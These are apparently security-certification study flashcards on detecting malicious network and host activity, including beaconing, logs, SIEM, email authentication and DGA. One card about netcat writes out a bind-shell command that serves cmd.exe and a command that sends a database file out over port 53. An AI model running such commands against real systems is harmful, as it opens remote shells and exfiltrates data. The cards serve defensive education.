Chapter 03: Malicious Activity Flashcards

1
Q

Router-Based Monitoring

A

Relies on routers or switches with routing capabilities to provide information about the flow of traffic on the network and the status of the network device itself

Also relies on capturing data about the traffic that’s passing through the device, which is referred to as network flows

2
Q

NetFlow, sFlow, J-Flow

A

Standard technologies for monitoring that capture flows and other router information

They record information about traffic at network device interfaces and then send that information to flow collectors

Flows are often sampled due to the sheer volume of data collected—usually 1 in 100 packets are sampled

3
Q

SNMP

A

Simple Network Management Protocol (Port 161/162)

Commonly used to collect information from routers and other network devices

Provides more information about the devices themselves, as opposed to the network traffic flow information provided by flow-capture protocols

4
Q

Flow Information Structure

A

You can see:
* Source IP
* Destination IP
* How many packets were sent
* How much data was sent
* Port and protocol used

You can feed flow information through a SIEM that uses behavior-based detection capabilities to find issues like unexpected comms to C2 systems

Page 81 diagram

5
Q

Active Monitoring

A

Techniques that reach out to remote systems and devices to gather data

Unlike flows and SNMP monitoring, where data is gathered by sending information to collectors, active monitors are typically the data gathering location

Sometimes they might forward the information to a collector though

Active monitoring gathers data about:
* Availability
* Routes
* Packet delay
* Packet loss
* Bandwidth

EX: ping and iPerf

6
Q

iPerf

A

A tool that measures the maximum bandwidth that an IP network can handle

Public iPerf servers allow remote testing of link bandwidth in addition to internal bandwidth testing

iPerf testing data can help establish a baseline for performance to help identify when a network will reach its useful limits

7
Q

Passive Monitoring

A

Capturing information about the network as traffic passes a location on a network link

EX: A network tap can send a copy of all traffic between endpoints to a passive monitoring capture system for review

Unlike active and router-based monitoring, passive doesn’t add additional traffic to the network

Performs after-the-fact analysis, since packets must be captured and then analyzed rather than being recorded in real time as they’re sent

8
Q

Bandwidth Consumption

A

Serious concern for analysts, since it can cause service outages and disruptions of business functions

Typically, the network will be configured to use logging and monitoring methods that fit its security, design, and monitoring requirements

All that data will be sent to a central system that can provide bandwidth usage alarms

9
Q

Beaconing

A

Malicious beaconing usually takes the form of a simple ping or “heartbeat” that’s sent to a C2 system as part of a botnet or malware remote control system, typically through HTTP/S

Beaconing can request commands, provide status, download additional malware, etc

Since it’s often encrypted, it blends in with other web traffic and can be difficult to identify

NOTE:
* Beaconing is not always malicious
* NTP servers, auto update systems, cluster services, etc
* These all send out beacons to let other services know they’re there and ready to support
* Always ask: is this malicious or is this authorized?

How Attackers Hide Beaconing
* Jitter: The use of a random delay to frustrate indicators based on regular connection attempt intervals
* Sparse Delivery: Reduced packet size that allows them to hide within the noise of other traffic

How Beacons Get Sent
IRC
* Not a need for IRC in most businesses, so it’s usually just turned off

HTTP/S
* Necessary for day to day work everywhere
* Your mitigation is to use an intercepting proxy at the network’s edge
* When somebody internal to your network wants to connect to something like Gmail over a secure connection, they connect to proxy first, which then makes secure connection to Gmail
* Defenders can analyze all traffic in and out using the HTTP/S connections

DNS
* Most DNS traffic isn’t inspected or filtered
* Don’t need a direct connection to the outside network and can use a local DNS resolver
* IoC 1: Several queries being repeated when a bot is checking into a C2 for more orders
* IoC 2: Commands sent within a DNS request or response query will be longer and more complicated than normal, but attackers will sometimes break their C2 messages into several different query chunks to avoid detection

Social Media
* People use social for messaging, and these messaging functions allow attackers to live off the land
* LinkedIn: Status updates from bots on LinkedIn would trigger malware signals
* Twitter: Hashtags would be used as part of the commands sent to bots

Cloud Services
* Attackers can spin up virtual machines or use app-based engines to send C2 messages
* Google’s App Engine platform or AWS Lambda has been used in the past

Metadata
* Exists within media and other files
* A set of data that describes and gives information about other data
* Metadata embedded in files can hold attacker’s C2 message

10
Q

How to Detect Beaconing Activity

A

Capture Metadata
* About all the sessions that are being established or trying to make connections
* Correlate that with analysis

IDS / IPS
* Use detection rules that identify known botnet controllers or botnet-specific behaviors

Flow Analysis
* Or other traffic-monitoring tools to ensure that systems aren’t sending unexpected traffic

Inspecting Outbound Traffic
* To ensure that infected systems aren’t resident in your network is just as important as the controls handling inbound traffic

Page 84 + 85 diagram

11
Q

Unexpected Traffic Spikes

A

Unexpected traffic on a network can take many forms:
* Scans
* Sweeps
* Probes
* Irregular P2P traffic between systems that aren’t expected to communicate directly
* Spikes in network traffic
* Activity on unexpected ports
* Direct attack traffic

12
Q

How to Detect Unexpected Traffic

A

Behavior-based detection capabilities with IDS / IPS

Traffic-monitoring systems

Manually observing traffic between systems

13
Q

Anomaly-Based Detection

A

AKA Baselines

Requires knowledge of what normal traffic is and looks like

Baselines are typically gathered during normal network operations

Once baseline data is gathered, monitoring systems can be set to alarm when the baselines are exceeded by a given threshold or when network behavior deviates from the baseline behaviors that were documented

14
Q

Behavior-Based Detection

A

AKA Heuristics

Uses network security devices and defined rules for scans, sweeps, attack traffic, and other network issues

15
Q

Protocol Analysis

A

Using a protocol analyzer to capture packets and check for problems

Protocol analyzers can help find unexpected traffic, like VPN traffic in a network where no VPN traffic should exist, or IPv6 tunnels running from an IPv4 production network

They can also identify when common protocols are being sent over an uncommon port, possibly indicating an attacker setting up an alternate service port

16
Q

How to Detect Scans, Sweeps, and Probes

A

These aren’t always significant threats to infrastructure by themselves, but they’re often precursors to more focused attacks

Detecting scans and probes is relatively simple, because of the behaviors they include like:
* Sequential testing of service ports
* Connecting to many IPs in a network
* Repeated requests to services that might not be active

Detecting stealth scans can be more challenging, but most IDS/IPS and other network security devices have built in scan detection capabilities

Enabling these features can create a lot of noise though, and sometimes you simply can’t do anything about a scan

Many orgs will feed their scan-related data into their SIEM to combine it with data from attacks and other events vs responding to scans and probes directly

17
Q

Activity on Unexpected Ports

A

This is due to one of two things:

  1. Scans and sweeps attempting to connect to ports and services
  2. Traffic to and from unexpected or new services set up by attackers

Always keep in mind that activity on unexpected ports could be either scenario, so look for additional context that can narrow it down

Malware and Ports
* There’s no comprehensive list of ports used by malware
* Every malware writer can decide what ports they want to use
* If an unknown open dynamic port (49152-65535) appears to be constantly open on a host, it may indicate a malicious traffic channel
* Nonstandard port usage, like HTTP, FTP, or DNS over a port that’s not the well-known port established for that protocol, is suspicious and worth investigating
* Mismatched port/application traffic, where non-standard traffic is communicated over a well-known or registered port

Mitigations
* Configure firewalls to allow only whitelisted ports to communicate on ingress and egress interfaces
* Configuration documentation should also show which server ports are allowed on any given host type
* Configure detection rules to detect mismatched protocol usage over a standard port

Netcat
* Normal Shell: Listener being set up inside the network on the victim
* Reverse Shell: Listener set up on the attacker’s machine making victim connect to them
* nc -lp 443 -e cmd.exe / nc IP 443
* This gives you a command prompt on the remote machine
* nc -lp 53 > database.sql
* Anything nc receives while listening over port 53 is put into the .sql file
* type database.sql | nc IP 53
* Pipe the type command to nc, which puts it on the listening IP at the port

18
Q

DoS Attack Patterns

A

DoS attacks follow one or more of the following patterns:

  • Attempts to overwhelm a network or service through the sheer volume of requests or traffic
  • Attacks on a specific service or system vulnerability to cause the system or service to fail
  • Attacks on an intermediary system or network to prevent traffic from making it between two locations

Each one of these patterns requires a slightly different method of detection

Your network, system, and service monitoring capabilities need to be set up to monitor for multiple types of attacks depending on your infrastructure

A DoS from a single system or network can typically be stopped by blocking that system or network using a firewall or other network security device

IPS can also block known attack traffic, preventing a DoS from occurring

19
Q

DDoS Attack Patterns

A

DDoS attacks come from many systems or networks at the same time

They can be harder to detect due to the traffic coming from many places, which makes it look more legitimate and makes it much harder to stop

Many DDoS attacks are made up of compromised systems in botnets, allowing attackers to send traffic from hundreds or thousands of systems

20
Q

Detecting DoS and DDoS

A

You have to use multiple types of tools and monitoring systems like:
* Performance monitoring using service performance monitoring tools
* Connection monitoring using local system or application logs
* Network bandwidth or system bandwidth monitoring (MB, GB, or TB per second)
* Dedicated tools like IDS or IPS with DoS and DDoS detection rules enabled

During response, CLI tools that analyze network traffic, like netstat, can help with troubleshooting on local servers

A view from the network or service perspective will typically provide a broader view of the issue

An unexpected surge in traffic from internet hosts could be an indication of an ongoing DDoS, but this must be backed up with other factors to verify:
* Excessive number of TIME_WAIT connections in a load balancer or web server’s state table
* High number of HTTP 503 Service Unavailable log events
* Large amounts of outbound traffic from the network can indicate that you have zombies in a botnet that are being used in a DDoS against others

Mitigating DDoS
* The Goal: Survive the DDoS attack
1. Conduct real-time log analysis to identify patterns of suspicious traffic and redirect it to a black hole or sinkhole
2. Use geolocation and IP reputation data to redirect or ignore suspicious traffic
3. Aggressively close slower connections by reducing the timeouts on affected servers
4. Use caching and backend infrastructure to offload processing to other servers
5. Utilize enterprise DDoS protection services like Cloudflare or Akamai

21
Q

Detecting and Finding Rogue Devices

A

These are devices that are connected to your network, but shouldn’t be, either by policy or because they’ve been added by an attacker

Finding rogue devices can be challenging, since many networks have hundreds or thousands of devices and device management might not be consistent across the network

Still, you can use the following to help:
* Valid MAC Address Checking: Uses MAC address information provided to network devices to validate the hardware to a list of known devices
* MAC Address Vendor Information Checking: Identify devices based on the vendor prefix for their devices
* Network Scanning: Uses tools like nmap to identify new devices with banner grabbing or fingerprinting
* Site Surveys: Physically reviewing the devices at a site, either by manual verification or by checking wireless networks on-site
* Traffic Analysis: Identify irregular or unexpected behavior with packet sniffers
* Digital Certificates: On endpoints and servers to authenticate and encrypt traffic using IPSec or HTTPS
* NAC and IDS

Types of Rogue Devices
* Network taps
* WAPs
* Servers
* Wired or wireless clients
* Software
* VMs
* Smart appliances

22
Q

Wired Rogues

A

Most wired rogues rely on open or unauthenticated networks to connect

Open networks without access controls like port security or NAC technology are easy targets for wired rogue devices

If you have one, it means one of two things has happened:
1. An employee or other trusted member of the org has connected a device, either without permission or without following the process required to do so
2. An attacker has connected a device to the network

In either case, respond to a wired rogue ASAP to remove it or handle it accordingly

To prevent them, you can restrict which devices can connect with port security or MAC address limiting tech, or NAC with required authentication to the network

NOTE: MAC addresses can be spoofed, so there’s no magic bullet here

23
Q

Wireless Rogues

A

Wireless rogue devices can’t always be tracked easily to a specific physical location

You might have to use signal strength measurements and mapping of an area to determine where the rogue is

If the wireless rogue is on your network, though, a port scan with OS identification turned on can often help locate the device

Wireless rogues can also spoof legit networks in attempts to persuade users that they’re part of the network, often by overpowering legit APs

You can invest in enterprise wireless controllers that will detect interference, report it, and in some cases automatically overpower it

24
Q

Processor Consumption and Monitoring

A

Understand what kind of processes consume CPU time, how much CPU utilization is occurring, and when the processes are running

Sudden spikes or increases in processor consumption can indicate new software or a process that was not previously active

Consistently high levels of CPU usage can also indicate DoS

This is a crucial part of monitoring, incident detection, and response

25
Q

Memory Consumption and Monitoring

A

Most OS level memory monitoring focuses on memory consumption rather than what’s stored in memory

Most protective measures for memory-based attacks occur as part of an OS built-in memory management or when code is compiled

Orgs will often set memory thresholds, which are alarms and notifications based on typical system memory usage during peak hours

Emergency levels and alarms will go off when a system or app is approaching an out-of-memory condition

26
Q

Drive Capacity and Consumption Monitoring

A

This focuses on specific capacity levels and is intended to prevent the drive volume from filling up and causing an outage

Tools to monitor drive capacity consumption are available on all major OS

27
Q

Filesystem Changes and Anomalies

A

Monitoring for filesystem changes in real time can catch attacks as they occur

You can use tools like:
* Wazuh: Open source, provides file integrity monitoring on files, permissions, ownership, and attributes—sends alerts based on its monitoring
* Tripwire: Commercial and open source
* AIDE: Advanced Intrusion Detection Environment, commercial

Manual verification of files using known good checksums is also part of many incident responders’ practices

NSRL (National Software Reference Library) collects digital signatures to allow verification against known checksums

28
Q

System Resource Monitoring Tools

A

Windows has built in resource and performance monitoring tools: resmon and perfmon

Resmon:
* Provides easy visibility into the CPU, memory, disk, and network utilization of a system
* Network monitoring capability shows processes with network activity, which TCP connections are open, and what services are associated with open ports on the system

Perfmon:
* More detailed data with counters ranging from energy usage to disk and network activity
* Supports collection from remote systems

29
Q

Linux Performance Monitoring Tools

A

To check the CPU, disk, and memory usage you can use:
* ps: Provides information about the CPU and memory utilization, the time that a process was started, how long it’s run, and the command that started the process
* top: Provides CPU utilization under CPU stats, as well as memory usage and other details about running processes
* df: Displays a report of the system’s disk usage
* w: Indicates which accounts are logged in (not directly resource-related, but useful when determining who might be running processes)

30
Q

Detecting Malware, Malicious Processes, and Unauthorized Software

A

Most managed environments will use a combination of these major methods to manage the software and apps on workstations, servers, and mobile devices:

  • Central management tools like Microsoft Endpoint Manager, which can manage software installation and report on installed software—does not monitor in real time like perfmon or resmon
  • Antivirus and antimalware tools, which are designed to detect potentially harmful software and files
  • EDR (Endpoint Detection and Response) can help detect malicious files and behavior, and allow responses that can stop attacks immediately
  • Software and file block listing, which uses a list of disallowed software and files and prohibits their installation—provides a broader list of prohibited files than only the malicious ones picked up by antivirus and antimalware
  • Application allow listing, which allows only permitted files and apps on a system

Windows Specific Tools
* sfc: Checks files and ensures they’re all running the correct versions and haven’t been modified
* Process Monitor and Explorer: Part of the sysinternals tool suite and can be used for live analysis and logging of processes run on the system
* Tasklist: CLI version of the task manager
* PE Explorer: Ability to browse structure of exe Windows file, see what processes are calling

Linux Tools
* pstree: Shows parent-child tree of all processes on Linux
* ps: Lists the attributes of all processes started by current process
* ps -A or -e: Shows all processes running for all users
* Malware will often use injection into shared libraries (.so)

31
Q

Abnormal OS Process Behavior

A

If you observe abnormal behaviors in the OS processes, it could indicate a rootkit or other malware has exploited an OS component

For Windows, these tools are most commonly associated with these kinds of attacks:
* cmd.exe
* at.exe
* schtasks.exe
* wmic.exe
* powershell.exe
* net.exe
* reg.exe
* sc.exe

Another common technique attackers use is to name a rogue process with a name that’s similar to a legit OS component or app, or use DLL execution to run services (rundll32.exe –> svchost)

32
Q

Unauthorized Scheduled Tasks

A

Windows: Task scheduler, which can be accessed in the start menu or CLI with schtasks—schtasks | more if you don’t want to scroll

Linux: /etc/crontab or /etc/cron or crontab -l—pay close attention to jobs running as superusers

33
Q

Application and Service Monitoring

A

A few key common, monitoring areas:
* Up/down: Is the service running?
* Performance: Does it respond quickly and as expected?
* Transactional logging: Information about the function of the service is captured, such as what actions users take or what actions are performed
* Application or service logging: Logs about the function or status of the service

Each area provides part of the puzzle for visibility into an app or service’s status, performance, and behavior

During an investigation, you’ll need to identify behavior that doesn’t match with what’s typically logged

34
Q

Application Logs

A

They provide tons of information, but require knowledge of what the app’s log format is, and what those logs will contain

Linux logs are usually in /var/log

Windows app logs can end up gathered by the Windows logging infrastructure or in app-specific directories or files

Analysts must ensure that appropriate logging is set up before an incident occurs so logs are available and will be protected from modification or deletion by an attacker

Always send critical app logs to a central log collection and/or analysis service

Common app logs:
* DNS Event Logs
* HTTP Access Logs
* FTP Access Logs
* SSH Access Logs
* SQL Event Logs

DNS Event Logs
* Contains a log of all the events for each time the DNS server handles a request to convert between a domain name and IP

HTTP Access Logs
* Log containing HTTP traffic that encountered an error or traffic that matches some pre-defined rule set
* Relevant information is recorded in the common log format (CLF) or W3C extended log file format
* Status codes indicate what happened with HTTP traffic
* Some server software logs will have HTTP header information

FTP Access Logs
* Log containing FTP traffic events in a W3C extended log format

SSH Access Logs
* Unstandardized type of log that can provide basic client-server session information

SQL Event Logs
* Event/error log that records events with fields like date, time, and the action taken (server startup, individual database startup, database cache clearing, databases not starting or shutting down unexpectedly)
* SQL servers can log individual query strings sent to the database

35
Q

Introduction of New Accounts

A

Attackers will try to create accounts in apps as part of their efforts to maintain persistence

Both cloud-hosted and on-premises apps need to be logged and monitored to ensure account creation is captured, and unexpected account creation results in alerts and reporting

Account and Session Management Tools
* Local Users and Groups: Windows tool used for the management of local accounts on a system
* Active Directory Users and Computers: Windows tool that’s used for the management of accounts on a DC
* NOTE: You can create accounts through CLI with net, WMIC, or PowerShell
* who, w, rwho: Linux tools for session management
* lastlog: Retrieves the log on history from /var/log/lastlog file and displays account name, TTY, remote host, and last time user was logged in
* faillog: Linux command that displays authentication failures
* egrep: Search for terms across all logs—egrep “Failed|Failure” /var/log/auth.log

36
Q

Application and Service Anomaly Detection

A

A variety of non-security related problems can result in anomalous activity for services and apps:
* App or service-specific errors, including authentication errors, service dependency issues, and permissions issues
* App or services that don’t start on boot, either because of a specific error or, in the case of services, because the service is disabled
* Service failures, which are often caused by updates, patches, or other changes

When troubleshooting, attempt to start or restart the service—if that doesn’t work, review the service’s log message or error message

Anomalies due to security issues can be detected with similar methods, but you can also deploy additional protection:
* Antimalware
* Antivirus
* EDR tools
* File integrity checking tools
* Allow list tools

37
Q

Windows Service Status

A

You can check with:
* services.msc: The Services administrative tool
* sc: CLI tool, Service Controller application
* PowerShell: Service cmdlets like Start-Service

38
Q

Linux Service Status

A

You can check with:
* service [servicename]
* service --status-all
* /etc/init.d/servicename status
* systemctl

39
Q

Application Error Monitoring

A

Windows: Logs to the Windows Application log, although some maintain their own dedicated log files, Windows Event Viewer, SCOM

Linux: /var/log, specific app log location

40
Q

Application Behavior Analysis

A

Apps that have been compromised or successfully attacked can suddenly start to behave in ways that aren’t typical

Outbound comms might occur, the app may make database or resource requests not typical to its behavior, or new files and accounts can be created

Understand typical app behavior with the following:
* Documentation of the app’s normal behavior, like what systems it should connect to and how those connections should be made
* Logging, to provide a view of normal operations
* Heuristic (behavioral) analysis using antimalware tools and other security-monitoring systems to flag when behaviors deviate from the norm

41
Q

Anomalous Activity

A

We need to look in different areas to identify something that’s unusual, aka anomalous:
* Web apps
* Databases
* DNS services
* Remote access servers

If we find anomalous activity, we have to classify it as either:
* Benign
* Malicious

Symptoms of Anomalous Activity
* Strange log entries
* Excessive per-process ports and resource consumption
* Unusual user accounts
* Unexpected outbound communication
* Unexpected output
* Service defacement
* Service interruptions

Unexpected Outbound Comms
* Unapproved outbound network connections
* If you see a lot of outbound connections in router or firewall logs, and you don’t know where they’re going and haven’t approved them, it could be an IOC of C2 or beacon

Unexpected Output
* Unusual request patterns or responses, can indicate an ongoing or past attack
* If you have a web app and when you run a query, you get an unexpected output, it could indicate the server is under attack
* Additionally, sometimes the output comes in the form of code
* Detect a code injection by monitoring the number of database reads or examining HTTP response packet sizes
* If an app displays unformatted error messages or strange strings, it could indicate app tampering

Services Defacement
* Occurs when an attacker gains control of a web server and alters the website’s presentation

Service Interruptions
* App services may fail to start or may stop unexpectedly for any number of reasons, not always an attack
* App interruption is caused by a service either failing to start or halting abruptly
* Check if security services are prevented from running
* Check if process running the service is compromised
* Check if service is disabled by D/DoS
* Check if excessive bandwidth usage is disrupting a service

Detect Anomalous Behavior
* Windows: Task manager, services.msc, net start (outputs running services to CLI), PowerShell (Get-Service to see all running)
* Linux: cron, systemctl, ps, top
* Application Logs: Critical to detect problems
* Behavioral baselines, filesystem integrity checking, log analysis

Page 103 + 104 for more

42
Q

Logs, Log Analysis, and Correlation

A

You have to know how to quickly assess the organizational impact of an event and determine if it’s localized or has broader scope

That requires the following:
* Knowing if other events are correlated with the initial event
* Understanding what systems, users, services, or other assets were involved or impacted
* Data classification for any data assets that are part of the event
* Other information that may influence organizational decisions about the event

43
Q

Event Logs

A

The Windows event log can be viewed directly on workstations using the Event Viewer

By default, Windows includes Application, Security, Setup, and System logs

Windows logs are stored in %SystemRoot%\System32\Winevt\Logs

Event Viewer also works for AD logs, but domains can generate more logs than you can handle—export them to a purpose-built log aggregation and analysis system

Five types of Event Logs in Windows:
1. Application: Events generated by apps and services
2. Security: Audit events like a failed logon or access being denied
3. System: Events generated by the OS and its services
4. Setup: Events generated during the installation of Windows
5. Forwarded Events: Events that are sent to the local host from other computers

Four severity categories for events:
* Information
* Warning
* Error
* Audit Success / Failure

44
Q

Syslog

A

Linux maintains information about the state of the system, events, and many other details in the /var/log directory

Additional logs can be in app-specific directories or other locations based on specific configurations or app and service defaults

Other Syslog details:
* Follows a client-server model
* De facto standard for logging of events from distributed systems
* Port 514 (UDP) over TCP/IP
* Has a PRI (priority) code
* The header contains the timestamp of the event and hostname
* The message portion contains the source process of the event and related content

Previous Security Issues Have Brought New Syslog Features
* Called syslog-ng or rsyslog
* Can use port 1468 (TCP) for consistent delivery
* TLS to encrypt messages sent to servers
* Use MD5 and SHA1 for authentication and integrity
* Message filtering, automated log analysis, event response scripting, and alternate message formats

45
Q

Security Device Logs

A

Security devices capture information about security events, system events, and other details that are useful to analysts

Most devices are capable of sending syslog-compatible messages, but what they contain and how they’re formatted can vary wildly from vendor to vendor

Regardless of what device log you’re looking at, always look for:
* The type of event you’re looking for
* What identifiers appear in it that match the event or entry you’re searching for

EX: If you’re looking for blocked traffic to a host with IP 10.1.10.4, you should look at other entries for that host

46
Q

Firewall Logs

A

Most firewall logs are similar

They identify the source and destination IP, port and protocol, and what action was taken on the traffic

They might include data like:
* The rule that was matched
* If there’s a specific threat identifier associated with a block
* Which interface or port the traffic entered or exited the firewall on
* Details on how much traffic was sent

47
Q

WAF Logs

A

Web App Firewall logs

Most have default rulesets that look for attacks matching the OWASP Top 10 or other common app security risks which allow admins to quickly enable a common ruleset

Usually stored in JSON format, and the logs will contain information like:
* Time of the event
* Severity of the event
* URL parameters
* HTTP method used
* Context for the rule

48
Q

Proxy Logs

A

Similar to firewall logs, proxy logs can provide useful information about connections and traffic

Proxies are used to either centralize access traffic or to filter traffic, so they usually contain:
* Source IP
* Destination IP
* Source port
* Destination port
* Requested resource
* Date and time
* Content type
* HTTP referrer
* Details about the content, like amount of traffic sent

When analyzing proxy logs, always look for the following:
* Target host IP, hostname, and what was requested
* The amount of content requested, as it could help indicate a compromise or match a known malicious package
* The HTTP request method, which can provide details of the query string with GET requests
* Unusual user agents and protocol versions, which may be useful for identifying apps, malware, or other targets

49
Q

IDS / IPS Logs

A

When a rule is triggered in IDS and IPS, the logs will contain information about the rule that was activated, as well as information about the traffic that was captured and analyzed
* EX: If you’re tracking malware that uses an IRC-based C2 network, you can search for rule hits that included a specific channel name or nickname that was used

Types of Log Outputs
* Unified output (machine readable binary file)
* Syslog
* CSV
* tcpdump (pcap)
* Input into a SIEM (centralized repository)

Snort Rule Format (Most Common)
* Action / Protocol / Source IP / Source Port / Direction (->, <>) / Destination IP / Destination Port / (Rule Option; Rule Option;…)

50
Q

SIEM

A

Security Information and Event Management System

These leverage centralized logging and gathering along with reporting and analysis capabilities to identify potential security issues

The information is combined with threat information, IOC data, etc. to help identify issues

SIEMs allow orgs to deal with massive volumes of data and security information generated by infrastructure, systems, and apps, and a major function of the SIEM is to parse and normalize data from all those different places for analysis and processing
* Data comes from listeners / collectors (syslog), agent-based (HIDS/HIPS, etc), and sensors (SPAN / taps)

Last, they provide incident management and response capabilities, allowing tracking, management, and oversight

NOTE:
* SIEM operates in Collection, Processing and Analysis, and Dissemination on the threat intelligence cycle
* Helps you collect, process, normalize, and analyze all that information
* Easily disseminate reports and information out to others
* SIEMs can be configured to automate much of this security intelligence cycle

To effectively deploy a SIEM:
1. Log all relevant events and filter irrelevant data
2. Establish and document the scope of events
3. Develop use cases to define a threat
4. Plan IR to an event
5. Establish a ticketing process to track events
6. Schedule regular threat hunting
7. Provide auditors and analysts an evidence trail

Popular SIEM Tools:
* Splunk (my fav)
* ELK Stack
* ArcSight (HIPAA, SOX, PCI DSS)
* QRadar (IBM’s platform)
* AlienVault and OSSIM (Open-Source Security Information Management / AT&T)
* Graylog (focused on DevOps and supporting IT)

51
Q

EDR

A

Endpoint Detection and Response

Tools deployed to endpoints, using agents to monitor for and detect potential security issues, attacks, and compromises

The endpoint agents report to a central console or system, providing visibility and management capabilities

EDRs focus on using threat patterns and IOCs, as well as behavioral analysis, to determine whether an issue is occurring or has occurred

They can automatically respond to threats and neutralize, contain, or alert

52
Q

SOAR

A

Security Orchestration, Automation, and Response

Tools used to integrate security tools and systems

They rely on APIs or other integration methods to gather data from security devices like firewalls, vulnerability scanners, antimalware tools, IDS and IPS, EDR, and SIEM

The data, alerting, and reporting centralization that SOAR platforms provide is used to drive security automation tasks like triggering responses, correlation and alerting across disparate systems, and feeding analytics capabilities

A key element of SOAR is the use of playbooks, or automated sets of actions that are used when specific sets of events or triggers occur

SOAR also focuses more on response with incident management, monitoring, and reporting, using data from events to build actionable threat intel from multiple sources

Orchestration
Orchestration is the automation of the automations, and there are three kinds:
1. Resource Orchestration
2. Workload Orchestration
3. Service Orchestration

Chef
* A way to automate configuration deployments and management of apps

Puppet
* Requires the installation of a master server and the client agents in the different targeted nodes to be able to do its orchestration

Ansible
* Doesn’t use user agents since everything is done with YAML

Docker
* Open platform for developing, shipping, running, and deploying apps using containerization

Kubernetes
* Provides an abstraction layer from managing these containers

53
Q

Packet Capture

A

Seeing into the traffic sent and received can help identify what’s occurring on the network

Wireshark and Tcpdump are the big two for the exam

Page 111 detailed explanations

54
Q

AbuseIPDB

A

A public tool that allows you to search for IPs, domains, or networks to see if they’ve been reported for abusive behavior

NOTE: Not considered 100% reliable, but useful as one of many other security measures that can help improve your posture

Page 114 for image

55
Q

Pattern Recognition

A

The ability to see common attack, exploit, and compromise patterns, and identify them for what they are

This is commonly used by AI and ML systems that look for known patterns associated with compromise or malicious activity

One of the most common focuses for pattern recognition techniques is to identify C2 traffic, or beaconing

It relies on patterns like this:
* Traffic to known malicious IPs or networks
* Traffic on unexpected ports
* Traffic via protocols that are not typically in use, or outside the scope of normal traffic via that protocol
* Large data transfers
* Traffic associated with processes that typically wouldn’t send traffic like notepad.exe on a Windows system
* Traffic sent at times of the day that aren’t associated with normal business hours
* Other unexpected behaviors that don’t match typical usage patterns

56
Q

Analyzing Email

A

Most orgs use automated email analysis as a first line of defense against malicious and spam emails

They look for known malicious or spam senders, often using block lists built using information from around the world

They also scan every email looking for malicious payloads like malware or other unwanted files

The same tools often perform header analysis and message content analysis

Attackers will exploit the fact that there are actually three sender addresses in an email:
Display From
* Support [support@diontraining . com]
* This is a name with anything we want to put in there
* Attackers can make it look like—Support@diontraining . com [theft@badguy . com]
* Mail clients will sometimes only show what’s outside the brackets, not the actual email address

Envelope From
* Various labels hidden from your mail client
* Essentially, this is your return address
* It can be anything, but you never see it because it’s hidden

Received From / By
* List of MTAs that processed the email
* Not displayed to your client

NOTE: If you think something is suspicious, open up the email header and start doing analysis on it

57
Q

Email Forwarding

A

When you forward an email, it places the content into a new mail envelope, removing the header information that you may need to investigate

SPF breaks because the forwarding sender will now be the sender, and SPF checks may fail at the new destination as a result

Automatic forwarding is a security concern that needs to be addressed, because attackers will sometimes use it to send emails once compromising a legitimate account

58
Q

DKIM

A

DomainKeys Identified Mail

Provides a cryptographic authentication mechanism for mail utilizing a public key published as a DNS record, and can either replace or be used with SPF

DKIM signs both the body of the message and elements of the header, helping to ensure the message is actually from the org it claims to be from

It adds a DKIM-Signature header, which can be checked against the public key that’s stored in public DNS entries for DKIM-enabled orgs

How It Works
* Once you’ve configured it, when you send an outgoing email, your MTA calculates a hash value of the selected message headers
* Signs that hash with its private key
* When the receiving server gets the message, it decrypts the hash value, and then runs your headers through the hash function
* If they match, nothing was modified in transit
* Done by the servers, not by the individual account, so you verify the server actually sent it

59
Q

SPF

A

Sender Policy Framework

An email authentication technique that allows orgs to publish a list of their authorized email servers

It’s a DNS record that identifies hosts authorized to send mail for the domain, with only one being allowed per domain

SPF records are added to the DNS information for your domain, and they specify which systems are allowed to send email from that domain

EXAMPLE
TXT @ v=spf1 mx include:_spf.google.com include:email.freshdesk.com -all
* You can only have one SPF statement, but this is one line when written in DNS
* You can authorize multiple servers to send on your behalf, but you can only do it in one line

When you receive an email, your server checks the DNS record and sees if the return path matches one of the servers in this mail record—if so, you’re likely to receive and it’s not spam

Systems not listed in SPF will be rejected

60
Q

DMARC

A

Domain-Based Message Authentication, Reporting, and Conformance

A protocol that ensures proper application of SPF and/or DKIM, utilizing a policy published as a DNS record, to determine whether an email message is authentic
* Like SPF and DKIM, DMARC records are published in DNS
* Unlike SPF and DKIM, DMARC can be used to determine if you should accept a message from a sender
* Using DMARC you can choose to reject or quarantine messages that aren’t sent by a DMARC-supporting sender

61
Q

File Analysis

A

To help analyze files for potentially malicious content, you can:

  1. Use hashing to compare potentially malicious or suspect files to original, known good files—Tripwire will monitor files based on hashes, but manual hashing with SHA256 or MD5 can be used to compare as well
  2. Search files for strings, which is helpful if you want to look at a compiled program like an exe to see what it might do—use the strings command in Linux

62
Q

Sandboxing

A

Safe, instrumented environments where you can run potentially malicious files and apps to determine what they attempt to do and how they do it

  1. Joe Sandbox: Allows analysts to analyze and understand the behavior of malware samples, test against multiple OS, and allow advanced options using a set of parameters
  2. Cuckoo Sandbox: An automated malware analysis tool that you can run as a self-hosted tool—Cuckoo works on more than malware, and analyzes PDFs, MS Office files, and malicious websites
  3. Flare VM: Allows you to run a Windows binary on the system and see what the status is and all the different changes the malware is making

Things we can do in a sandbox environment, especially when analyzing malware:
* Monitor system changes
* Execute known malware
* Identify process changes
* Monitor network activity
* Monitor system calls
* Create snapshots
* Record file creation and deletion
* Dump VM memory

63
Q

DGA

A

Domain Generation Algorithm

Method used by malware to evade blocklists by dynamically generating domain names for C2 networks

Instead of a static IP or name, they can create new ones and pick from a list, and keep moving through them until we block them all—then they just create new ones after we block them all

How attackers do this:
1. Attacker sets up one or more DDNS (dynamic DNS) services—allows them to have domain names generated on the fly, and they’ll sign up with a service using fake payment or credentials, or a host that doesn’t care about illicit activity
2. Malware code implements the DGA to create a list of new domain names
3. A parallel DGA is used to create name records on the DDNS service—matches to the malware based on the same seed that’s generated in the previous step
4. The malware tries a selection of the domains it’s created to connect to C2
5. C2 server communicates with a new seed for the DGA to prevent being blocked

Fast Flux Network
Method used by malware to hide the presence of C2 networks by continually changing the host IP addresses in domain records using DGA

How to Detect DGA
* If you see callouts from your systems to random-looking domains like A1ZWBR93 . com / 94ZGYJS9 . com / etc
* If you get a high rate of NXDOMAIN errors when resolving the DNS

How to Mitigate DGA
* Use a secure recursive DNS resolver
* This allows one trusted DNS server to communicate with other trusted DNS servers to search for an IP address and return it to the client

64
Q

ACL

A

Access control lists are processed from top to bottom with the most specific rules at the top

Basic rules for ACL:
1. Block incoming requests from internal or private, loopback, and multicast IP address ranges
2. Block incoming requests from protocols that should only be used locally, like ICMP, DHCP, OSPF, SMB, etc
3. Configure IPv6 to either block all IPv6 traffic or allow it to only authorized hosts and ports

